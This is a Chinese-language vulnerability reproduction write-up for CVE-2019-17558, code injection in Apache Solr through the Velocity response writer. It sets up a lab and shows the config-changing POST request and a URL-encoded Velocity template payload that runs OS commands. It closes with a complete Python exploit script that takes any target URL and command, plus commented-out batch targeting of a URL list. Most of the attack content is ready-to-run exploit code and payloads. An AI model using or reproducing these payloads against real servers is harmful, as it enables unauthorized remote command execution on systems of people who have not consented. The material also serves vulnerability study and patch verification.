(CVE-2019-17558)Apache Solr 代码注入漏洞¶
一、漏洞简介¶
Apache Solr 5.0.0版本至8.3.1版本中存在代码注入漏洞。攻击者通过未授权访问solr服务器,发送特定的数据包开启paramsresource.loader.enabled,然后get访问接口导致服务器命令执行,命令回显结果在response
二、漏洞影响¶
Apache Solr 5.0.0版本至8.3.1
三、复现过程¶
环境搭建¶
https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2 https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/solr-7.7.2.zip
velocity.solrresource.loader.enabled:true¶
/opt/solr-7.7.2/example/example-DIH/solr/atom/conf/solrconfig.xml
root@kali:/opt/solr-7.7.2/example/example-DIH/solr/atom/conf# cat solrconfig.xml | grep enable
<enableLazyFieldLoading>true</enableLazyFieldLoading>
<str name="solrresource.loader.enabled">${velocity.solrresource.loader.enabled:false}</str>
<str name="paramsresource.loader.enabled">${velocity.paramsresource.loader.enabled:false}</str>
root@kali:/opt/solr-7.7.2/example/example-DIH/solr/atom/conf#
开启dih 示例¶
./solr -e dih -force root@kali:/opt/solr-7.7.2/bin# ./solr -e dih -force *** [WARN] *** Your open file limit is currently 1024. It should be set to 65000 to avoid operational disruption. If you no longer wish to see this warning, set SOLR_ULIMIT_CHECKS to false in your profile or solr.in.sh Starting up Solr on port 8983 using command: "/opt/solr-7.7.2/bin/solr" start -p 8983 -s "/opt/solr-7.7.2/example/example-DIH/solr" -force Waiting up to 180 seconds to see Solr running on port 8983 [\] Started Solr server on port 8983 (pid=20222). Happy searching! Solr dih example launched successfully. Direct your Web browser to http://localhost:8983/solr to visit the Solr Admin UI root@kali:/opt/solr-7.7.2/bin#
浏览器访问
http://10.10.20.166:8983/solr/#/
ApacheSolr代码注入漏洞/media/rId27.jpg)
到此,漏洞环境搭建完成。
漏洞复现¶
用户在打开网站时候,再burpsuite里面会发现一个接口,可以获取所有core name的名称,方便后续遍历core name,拼接字符串,依次检测漏洞
ApacheSolr代码注入漏洞/media/rId29.jpg)
http://www.0-sec.org:8983/solr/admin/cores?_=1572594549070&indexInfo=false&wt=json
简写为
http://www.0-sec.org:8983/solr/admin/cores?indexInfo=false&wt=json { "responseHeader": { "status": 0, "QTime": 3 }, "initFailures": {}, "status": { "atom": { "name": "atom", "instanceDir": "/opt/solr-7.7.2/example/example-DIH/solr/atom", "dataDir": "/opt/solr-7.7.2/example/example-DIH/solr/atom/data/", "config": "solrconfig.xml", "schema": "managed-schema", "startTime": "2019-11-01T07:47:08.216Z", "uptime": 107753 }, "db": { "name": "db", "instanceDir": "/opt/solr-7.7.2/example/example-DIH/solr/db", "dataDir": "/opt/solr-7.7.2/example/example-DIH/solr/db/data/", "config": "solrconfig.xml", "schema": "managed-schema", "startTime": "2019-11-01T07:47:09.224Z", "uptime": 106745 }, "mail": { "name": "mail", "instanceDir": "/opt/solr-7.7.2/example/example-DIH/solr/mail", "dataDir": "/opt/solr-7.7.2/example/example-DIH/solr/mail/data/", "config": "solrconfig.xml", "schema": "managed-schema", "startTime": "2019-11-01T07:47:06.695Z", "uptime": 109273 }, "solr": { "name": "solr", "instanceDir": "/opt/solr-7.7.2/example/example-DIH/solr/solr", "dataDir": "/opt/solr-7.7.2/example/example-DIH/solr/solr/data/", "config": "solrconfig.xml", "schema": "managed-schema", "startTime": "2019-11-01T07:47:06.702Z", "uptime": 109267 }, "tika": { "name": "tika", "instanceDir": "/opt/solr-7.7.2/example/example-DIH/solr/tika", "dataDir": "/opt/solr-7.7.2/example/example-DIH/solr/tika/data/", "config": "solrconfig.xml", "schema": "managed-schema", "startTime": "2019-11-01T07:47:03.493Z", "uptime": 112475 } } }
利用Burpsuite 发包 ,开启paramsresource.loader.enabled
paramsresource.loader.enabled 默认是false
由于我们修改的atom目录下的配置文件,所以我们只能拿这个存在配置缺陷的接口来攻击
http://www.0-sec.org:8983/solr/atom/config
ApacheSolr代码注入漏洞/media/rId30.jpg)
BurpSuite request
POST /solr/atom/config HTTP/1.1 Host: www.0-sec.org:8983 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 259 Connection: close Upgrade-Insecure-Requests: 1 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solrresource.loader.enabled": "true", "paramsresource.loader.enabled": "true" } }
BurpSuite response
HTTP/1.1 200 OK Connection: close Content-Type: application/json;charset=utf-8 Content-Length: 149 { "responseHeader":{ "status":0, "QTime":554}, "WARNING":"This response format is experimental. It is likely to change in the future."}
开启后,直接Get 访问(带入表达式)进行 远程代码命令执行
http://www.0-sec.org:8983/solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
ssit
http://www.0-sec.org:8983/solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom= #set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
ApacheSolr代码注入漏洞/media/rId31.jpg)
注意到 状态码是400,而不是200,出现500的情况可能是 异常报错。
poc¶
usage
python solr_rce.py http://www.0-sec.org:8983 command
ApacheSolr代码注入漏洞/media/rId33.jpg)
#coding=utf-8 import requests import sys import json banner = ''' _ _____ _ _____ _____ ______ /\ | | / ____| | | | __ \ / ____| ____| / \ _ __ __ _ ___| |__ ___ | (___ ___ | |_ __ | |__) | | | |__ / /\ \ | '_ \ / _` |/ __| '_ \ / _ \ \___ \ / _ \| | '__| | _ /| | | __| / ____ \| |_) | (_| | (__| | | | __/ ____) | (_) | | | | | \ \| |____| |____ /_/ \_\ .__/ \__,_|\___|_| |_|\___| |_____/ \___/|_|_| |_| \_\\_____|______| | | |_| Apache Solr Velocity模板远程代码执行 2019-10-30 17:30 python By Jas502n >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ''' print banner def get_code_name(url): if url[-1] == '/': url = url[:-1].split('\n')[0] else: url = url.split('\n')[0] core_url = url + '/solr/admin/cores?indexInfo=false&wt=json' print '[+] Querying Core Name: '+core_url,'\n' proxies = {"http":"http://127.0.0.1:8080"} try: # r = requests.get(core_url,proxies=proxies) r = requests.get(core_url) if r.status_code == 200 and 'responseHeader' in r.content and 'status' in r.content: json_str = json.loads(r.content) for i in json_str['status']: core_name_url = url + '/solr/' + i + '/config' print core_name_url update_queryresponsewriter(core_name_url) else: print "No core name exit!" except: pass def update_queryresponsewriter(core_name_url): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'Content-Length': '259', 'Connection': 'close' } payload = ''' { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solrresource.loader.enabled": "true", "paramsresource.loader.enabled": "true" } }''' proxies = {"http":"http://127.0.0.1:8080"} r = requests.post(core_name_url,headers=headers,data=payload) # r = requests.post(core_name_url,headers=headers,data=payload,proxies=proxies) if r.status_code == 200 and 'responseHeader' in r.content: print "[+] maybe enable Successful!" exp_url = core_name_url[:-7] cmd = 'whoami' cmd = sys.argv[2] send_exp(exp_url,cmd) else: print "[+] Enable Fail!\n" def send_exp(exp_url,cmd): exp_url = exp_url + r"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + cmd + r"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" proxies = {"http":"http://127.0.0.1:8080"} r = requests.get(exp_url) # r = requests.get(exp_url,proxies=proxies) if r.status_code == 400 or r.status_code == 500 or r.status_code ==200 and len(r.content) >0: print ">>> [+] Exp Send Successful! <<<" print "____________________________________________________________" print '\n',exp_url,'\n' print '>>>>>>>\n',r.content else: print "[+] EXP No Send Successful!\n" if __name__ == '__main__': if len(sys.argv) != 3: sys.exit("\n [+] Usage: python %s http://x.x.x.x:8983 command\n" % sys.argv[0]) else: # url = "http://192.168.5.86:8983" url = sys.argv[1] get_code_name(url) # 批量 # f = open('url.txt','rb') # for i in f.readlines(): # url = i.split('\r\n')[0] # get_code_name(url)